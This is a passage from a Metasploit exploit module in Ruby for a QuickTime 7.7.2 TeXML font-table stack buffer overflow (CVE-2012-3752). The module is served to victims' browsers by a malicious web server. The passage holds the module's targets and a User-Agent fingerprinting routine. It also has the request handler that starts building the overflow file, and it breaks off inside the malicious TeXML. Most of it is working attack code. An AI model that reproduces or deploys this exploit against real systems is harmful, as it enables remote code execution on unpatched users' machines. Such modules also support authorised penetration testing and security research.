##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:os_name => OperatingSystems::WINDOWS,
:javascript => true,
:rank => NormalRanking
})
def initialize(info = {})
super(update_info(info,
'Name' => 'Apple QuickTime 7.7.2 TeXML Style Element font-table Field Stack Buffer Overflow',
'Description' => %q{
This module exploits a vulnerability found in Apple QuickTime. When handling
a TeXML file, it is possible to trigger a stack-based buffer overflow, and then
gain arbitrary code execution under the context of the user. This is due to the
QuickTime3GPP.gtx component not handling certain Style subfields properly, as the
font-table field, which is used to trigger the overflow in this module. Because of
QuickTime restrictions when handling font-table fields, only 0x31-0x39 bytes can be
used to overflow, so at the moment DEP/ASLR bypass hasn't been provided. The module
has been tested successfully on IE6 and IE7 browsers (Windows XP and Vista).
},
'Author' =>
[
'Arezou Hosseinzad-Amirkhizi', # Vulnerability Discovery
'juan vazquez' # Metasploit Module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'OSVDB', '87087' ],
[ 'CVE', '2012-3752' ],
[ 'BID', '56557' ],
[ 'URL', 'http://support.apple.com/kb/HT5581' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f'
},
'Payload' =>
{
'Space' => 1000,
},
'Platform' => 'win',
'Targets' =>
[
# Tested with QuickTime 7.7.2
[ 'Automatic', {} ],
[ 'IE 6 on Windows XP SP3', {} ],
[ 'Firefox 3.5 on Windows XP SP3', {} ],
[ 'Firefox 3.5.1 on Windows XP SP3', {} ]
],
'Privileged' => false,
'DisclosureDate' => 'Nov 07 2012',
'DefaultTarget' => 0))
register_options(
[
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation'])
], self.class)
end
def get_target(agent)
#If the user is already specified by the user, we'll just use that
return target if target.name != 'Automatic'
nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
browser_name = ""
if agent =~ /MSIE/
browser_version = agent.scan(/MSIE (\d)/).flatten[0] || ''
browser_name = "IE #{browser_version}"
elsif agent =~ /Firefox\/3.5$/
browser_name = "Firefox 3.5 "
elsif agent =~ /Firefox\/3.5.1$/
browser_name = "Firefox 3.5.1"
elsif agent =~ /Opera\/9/
browser_name = "Opera"
end
case nt
when '5.1'
os_name = 'Windows XP SP3'
when '6.0'
os_name = 'Windows Vista'
when '6.1'
os_name = 'Windows 7'
end
targets.each do |t|
if (!browser_name.empty? and t.name.include?(browser_name)) and (!nt.empty? and t.name.include?(os_name))
print_status("Target selected as: #{t.name}")
return t
end
end
return nil
end
def on_request_uri(client, request)
return if ((p = regenerate_payload(client)) == nil)
agent = request.headers['User-Agent']
my_target = get_target(agent)
# Avoid the attack if no suitable target found
if my_target.nil?
print_error("Browser not supported, sending 404: #{agent}")
send_not_found(cli)
return
end
if request.uri =~ /\.3gp/
print_status("Sending exploit TEXML (target: #{my_target.name})")
my_payload = "1" * (1024*16)
texml = <<-eos